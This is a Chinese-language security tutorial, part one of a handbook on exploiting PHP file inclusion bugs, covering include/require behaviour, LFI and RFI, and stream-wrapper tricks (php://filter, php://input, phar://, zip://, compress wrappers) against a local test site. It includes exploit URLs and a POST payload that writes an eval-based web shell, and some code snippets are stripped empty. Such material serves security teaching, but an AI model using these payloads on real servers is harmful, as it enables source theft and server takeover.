美文网首页Ethical Hackers网络安全实验室
PHP文件包含漏洞利用思路与Bypass总结手册(一)

PHP文件包含漏洞利用思路与Bypass总结手册(一)

作者: 蚁景科技 | 来源:发表于2020-04-26 14:49 被阅读0次

    前言

    这个手册主要是记录针对PHP文件包含漏洞的利用思路与Bypass手法的总结。

    相关函数

    四个函数

    php中引发文件包含漏洞的通常主要是以下四个函数:

    1、include()

    http://www.php.net/manual/en/function.include.php

    2、include_once()

    http://php.net/manual/en/function.include-once.php

    3、require()

    http://php.net/manual/en/function.require.php

    4、require_once()

    http://php.net/manual/en/function.require-once.php

    函数功能

    当利用这四个函数来包含文件时,不管文件是什么类型(图片、txt等等),都会直接作为php文件进行解析。

    函数差异

    include()

    include() 函数包含出错的话,只会提出警告,不会影响后续语句的执行

    require()

    require() 函数包含出错的话,则会直接退出,后续语句不在执行

    include_once() 和 require_once()

    require_once() 和 include_once() 功能与require() 和 include() 类似。但如果一个文件已经被包含过了,则 require_once() 和 include_once() 则不会再包含它,以避免函数重定义或变量重赋值等问题。

    二次包含

    一次包含

    漏洞原因

    文件包含函数所加载的参数没有经过过滤或者严格的定义,可以被用户控制,包含其他恶意文件,导致执行了非预期的代码。

    漏洞分类

    LFI

    LFI本地文件包含漏洞主要是包含本地服务器上存储的一些文件,例如session文件、日志文件、临时文件等。同时借助此漏洞也可以查看服务器上的一些重要文件。但是,只有我们能够控制包含的文件存储我们的恶意代码才能拿到服务器权限。

    例如本地读取/etc/passwd系统重要文件

    RFI

    RFI(Remote File Inclusion) 远程文件包含漏洞。是指能够包含远程服务器上的文件并执行。由于远程服务器的文件是我们可控的,因此漏洞一旦存在危害性会很大。但RFI的利用条件较为苛刻,需要php.ini中进行配置

    allow_url_fopen = On

    该选项为on便是激活了 URL 形式的 fopen 封装协议使得可以访问 URL 对象文件等。

    allow_url_include:On

    该选项为on便是允许 包含URL 对象文件等。

    两个配置选项均需要为On,才能远程包含文件成功

    修改php.ini

    在php.ini中,allow_url_fopen默认一直是On,而allow_url_include从php5.2之后就默认为Off。

    php5.5.9 -> php.ini

    包含姿势

    php伪协议

    PHP 带有很多内置 URL 风格的封装协议,可用于类似 fopen()、 copy()、 file_exists() 和 filesize() 的文件系统函数。除了这些封装协议,还能通过 stream_wrapper_register() 来注册自定义的封装协议。

    可以在phpinfo中的Registered PHP Streams中找到可使用的协议。

    下面测试代码均为:

    若有特殊案例,会声明。

    php.ini

    若有特殊要求,会在利用条件里指出。

    php://filter

    php://filter 是一种元封装器, 设计用于数据流打开时的筛选过滤应用。

    参数

    过滤器列表

    字符串过滤器

    string.strip_tags

    转换过滤器

    压缩过滤器

    加密过滤器

    可用过滤器列表:https://www.php.net/manual/zh/filters.php

    利用条件:无

    利用姿势1

    index.php?file=php://filter/read=convert.base64-encode/resource=index.php

    通过指定末尾的文件,可以读取经base64加密后的文件源码,之后再base64解码一下就行。虽然不能直接获取到shell等,但能读取敏感文件危害也是挺大的。同时也能够对网站源码进行审计。

    利用姿势2

    index.php?file=php://filter/convert.base64-encode/resource=index.php

    效果跟前面一样,只是少了个read关键字,在绕过一些waf时也许有用。

    file://

    专们用于访问本地文件系统和php://filter类似都可以对本地文件进行读取

    用法

    利用条件:无

    利用姿势

    php://input

    php://input是个可以访问请求的原始数据的只读流,将post请求中的数据作为PHP代码执行。

    利用条件

    利用姿势

    也可以使用burpsuite或curl进行利用

    curl -v "http://127.0.0.1/FI/index.php?file=php://input" -d ""

    Getshell

    POST:<?PHP fputs(fopen('shell.php','w'),'<?php @eval($_POST[Qftm])?>');?>

    file_get_contents()的利用

    file_get_contents()函数将整个文件读入一个字符串中

    测试代码

    利用条件:无

    利用姿势:

    php://input可以访问请求的原始数据的只读流。即可以直接读取到POST上没有经过解析的原始数据。enctype=”multipart/form-data” 的时候 php://input 是无效的。

    phar://

    phar:// 支持zip、phar格式的文件包含。

    zip

    用法

    利用条件:php >= 5.3.0

    利用姿势1

    配合文件上传漏洞,当仅可以上传zip格式时

    index.php?file=phar://index.zip/index.txtindex.php?file=phar://D:/QSoftware/W3Server/phpstudy2019/WWW/FI/index.zip/index.txt

    新建index.txt,使用zip格式压缩 -> index.zip

    利用姿势2

    配合文件上传漏洞,当仅可以上传图片格式时

    针对phar://不管后缀是什么,都会当做压缩包来解压。

    index.php?file=phar://head.png/head.txtindex.php?file=phar://D:/QSoftware/W3Server/phpstudy2019/WWW/FI/head.png/head.txt

    将做好的zip后缀改为png格式

    phar

    phar文件本质上是也一种压缩文件。

    用法

    ?file=phar://[压缩包文件相对路径]/[压缩文件内的子文件名]

    ?file=phar://[压缩包文件绝对路径]/[压缩文件内的子文件名]

    制作phar文件

    制作包含恶意代码文件的phar文件

    (1)确保本地php.ini中phar.readonly=Off

    (2)编写恶意phar文件的php脚本

    phar.php

    @unlink("phar.phar");

    $phar = new Phar("phar.phar");

    $phar->startBuffering();

    $phar->setStub("");  //设置stub

    $phar->addFromString("head.txt", "");  //添加要压缩的文件及内容

    //签名自动计算

    $phar->stopBuffering();

    ?>

    (3)生成phar文件

    利用条件:php >= 5.3.0

    利用姿势1

    index.php?file=phar://phar.phar/head.txt

    index.php?file=phar://D:/QSoftware/W3Server/phpstudy2019/WWW/FI/phar.phar/head.txt

    利用姿势2

    index.php?file=phar://phar.png/head.txtindex.php?file=phar://D:/QSoftware/W3Server/phpstudy2019/WWW/FI/phar.png/head.txt

    利用协议特性,更改后缀文件可适当绕过一些限制

    zip://

    zip协议和phar协议类似,都支持相对路径和绝对路径(几乎网上所有人都说zip协议不支持相对路径,事实上是可以!!!)

    在php version 5.2.9时已经修复zip://相对路径问题

    使用zip协议,需将#编码为%23(浏览器时)

    用法

    利用条件:php >= 5.2(绝对路径) | php >= 5.29(相对/绝对路径)

    利用姿势1

    index.php?file=zip://head.zip%23head.txtindex.php?file=zip://D:/QSoftware/W3Server/phpstudy2019/WWW/FI/head.zip%23head.txt

    利用姿势2

    针对zip://不管后缀是什么,都会当做压缩包来解压,可以适当的绕过一些限制。

    index.php?file=zip://head.png%23head.txtindex.php?file=zip://D:/QSoftware/W3Server/phpstudy2019/WWW/FI/head.png%23head.txt

    相对路径

    php5.3.29 windows

    php5.5.9 windows

    5.4.16 Linux Centos7

    绝对路径

    windwos

    Linux Centos7

    bzip2://

    用法

    ?file=compress.bzip2://[压缩包文件相对路径]

    ?file=compress.bzip2://[压缩包文件绝对路径]

    利用条件:php >= 5.2

    利用姿势1

    index.php?file=compress.bzip2://head.bz2index.php?file=compress.bzip2://D:/QSoftware/W3Server/phpstudy2019/WWW/FI/head.bz2

    相对路径

    绝对路径

    利用姿势2

    利用协议特性,更改后缀文件可适当绕过一些限制

    index.php?file=compress.bzip2://head.jpgindex.php?file=compress.bzip2://D:/QSoftware/W3Server/phpstudy2019/WWW/FI/head.jpg

    zlib://

    用法

    ?file=compress.zlib://[压缩包文件相对路径]

    ?file=compress.zlib://[压缩包文件绝对路径]

    利用条件:php >= 5.2

    利用姿势1

    index.php?file=compress.zlib://head.gzindex.php?file=compress.zlib://D:/QSoftware/W3Server/phpstudy2019/WWW/FI/head.gz

    相对路径

    绝对路径

    利用姿势2

    利用协议特性,更改后缀文件可适当绕过一些限制

    index.php?file=compress.zlib://head.jpgindex.php?file=compress.zlib://D:/QSoftware/W3Server/phpstudy2019/WWW/FI/head.jpg

    data://

    数据流封装器,和php://相似都是利用了流的概念

    用法

    利用条件

    利用姿势1

    ......未完待续

    实验推荐--文件包含漏洞-中级篇(介绍文件包含时绕过限制的原理,以及介绍利用文件包含漏洞读取源码的原理。)

    http://hetianlab.com/expc.do?ec=ECID21bb-8308-4117-ab95-a4602fa6c377

    相关文章

      网友评论

        本文标题:PHP文件包含漏洞利用思路与Bypass总结手册(一)

        本文链接:https://www.haomeiwen.com/subject/ksadwhtx.html